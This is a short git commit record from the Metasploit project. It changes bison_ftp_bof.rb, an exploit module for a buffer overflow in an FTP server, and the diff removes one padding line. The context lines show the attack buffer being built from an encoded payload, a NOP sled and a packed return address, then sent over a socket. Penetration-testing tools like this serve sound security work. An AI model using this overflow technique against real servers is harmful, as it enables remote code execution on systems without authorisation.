Update bison_ftp_bof.rb

bug/bundler_fix
JT 2015-11-20 23:45:15 +08:00
parent 1dee6dca1b
commit e3bca890c1
1 changed files with 0 additions and 1 deletions

View File

@ -81,7 +81,6 @@ class Metasploit4 < Msf::Exploit::Remote
buf << payload.encoded
buf << make_nops(388 - payload.encoded.length)
buf << [target.ret].pack('V')
buf << rand_text_alpha(39)
print_status('Sending payload...')
sock.put(buf)